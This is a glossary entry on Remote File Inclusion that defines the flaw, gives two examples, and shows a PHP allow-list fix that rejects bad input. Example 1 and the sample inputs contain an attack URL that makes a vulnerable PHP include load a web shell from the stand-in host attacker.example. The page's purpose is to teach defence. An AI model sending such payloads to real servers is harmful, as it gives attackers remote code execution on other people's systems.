Vol. 1 · Ed. 2026
CyberGlossary
Entry № 1030

Remote File Inclusion (RFI)

Reviewed by Cybersecurity entrepreneur & security researcher

What is Remote File Inclusion (RFI)?

Remote File Inclusion (RFI): A vulnerability that lets an attacker force a server to fetch and execute code from a remote URL of their choosing.


Remote File Inclusion (RFI) occurs when an application passes user-controlled input to an include or require function and the runtime supports remote URLs (for example PHP with allow_url_include enabled). The server downloads the file from an attacker-controlled host and executes it within the application's process, yielding immediate remote code execution. RFI is generally more severe than LFI because no prior write access to the server is required. Defences are disabling remote URL inclusion in the runtime, using strict allow-lists of static module names, never including paths derived from user input, and segmenting application servers with strict egress filtering.

Examples

  1. A PHP app calling include($_GET['page']) where ?page=https://attacker.example/shell.txt loads and runs a web shell.

  2. An outdated CMS plugin pulling an admin page from a URL parameter, allowing an attacker-hosted PHP file to execute.
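
The pattern from example 1 beside the allow-list defence named in the definition, as an added example that is not code from this glossary or from any particular application. The page names, file paths and the helper functions resolve_page() and remote_include_enabled() are hypothetical.

```php
<?php
declare(strict_types=1);   // requires PHP 8.0+ for the `mixed` type below

// Vulnerable pattern from example 1, shown for contrast and left disabled:
// include($_GET['page']);

// Allow-list of static module names. Names and paths are hypothetical.
const PAGES = [
    'home'    => __DIR__ . '/pages/home.php',
    'about'   => __DIR__ . '/pages/about.php',
    'contact' => __DIR__ . '/pages/contact.php',
];

/**
 * Map a request parameter to a fixed file path, or null when it is not
 * allow-listed. The user value is only an array key, never a path or URL.
 */
function resolve_page(mixed $requested): ?string
{
    if (!is_string($requested)) {      // ?page[]=x arrives as an array
        return null;
    }
    return PAGES[$requested] ?? null;
}

/** Report whether the runtime would still permit URL includes. */
function remote_include_enabled(): bool
{
    return filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

if (remote_include_enabled()) {
    error_log('allow_url_include is On; set allow_url_include = Off in php.ini');
}

// Constructed sample inputs; the second is the URL from example 1.
$samples = ['about', 'https://attacker.example/shell.txt', 'no-such-page', ['x']];
foreach ($samples as $input) {
    $path = resolve_page($input);
    printf("%-40s => %s\n", json_encode($input, JSON_UNESCAPED_SLASHES),
        $path === null ? 'rejected (respond 404)' : 'require ' . basename($path));
}

// In a real handler the result is used like this:
//   $path = resolve_page($_GET['page'] ?? 'home');
//   if ($path === null) { http_response_code(404); exit; }
//   require $path;
```

Because the request value only selects a key, a URL, a path or an array in ?page= never reaches include or require, regardless of the runtime's allow_url_include setting.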

Frequently asked questions

What is Remote File Inclusion (RFI)?

A vulnerability that lets an attacker force a server to fetch and execute code from a remote URL of their choosing. It belongs to the Attacks & Threats category of cybersecurity.

How do you defend against Remote File Inclusion (RFI)?

Defences for Remote File Inclusion (RFI) typically combine technical controls and operational practices, as detailed in the full definition above.

What are other names for Remote File Inclusion (RFI)?

Common alternative names include: RFI.
